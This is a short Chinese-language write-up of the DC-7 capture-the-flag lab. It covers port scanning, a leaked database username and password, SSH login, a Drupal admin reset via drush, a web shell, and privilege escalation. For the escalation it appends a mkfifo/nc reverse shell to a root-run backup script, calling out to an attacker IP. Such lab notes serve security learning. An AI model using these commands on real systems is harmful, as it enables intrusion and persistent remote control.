DC-7 學習過程
阿新 • • 發佈:2020-12-07
DC-7
上線自帶ip
開啟目標網頁
nmap掃一下
檢視網站子目錄,沒有發現有用目錄
百度搜索@DC7USER
都看看,發現配置檔案中有伺服器的賬號密碼
獲得資料庫賬號密碼,試一下剛才掃出來的22埠能否登陸
$使用者名稱= "dc7user";
$密碼= " MdR3xOgB7#dW ";
$dbname = "Staff";
$conn = mysqli_connect($伺服器名, $使用者名稱, $密碼, $dbname);
成功登陸
檢視當前檔案,提示有一份新郵件在那個目錄:
巨長一篇, 翻譯看不懂,放棄
進入網站根目錄,修改網站管理員密碼
drush user-password admin --password=“123456”
嘗試登陸
找啊找
需要安裝php外掛才能識別
給伺服器安裝php外掛安裝成功後開始嘗試連線蟻劍
Python –c ‘import pty;pty.spawn(“/bin/bash”)’ 回顯
發現不是root,進行提權
將以下命令追加至/opt/scripts/backups.sh檔案中
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.xxx.xxx 1111>/tmp/f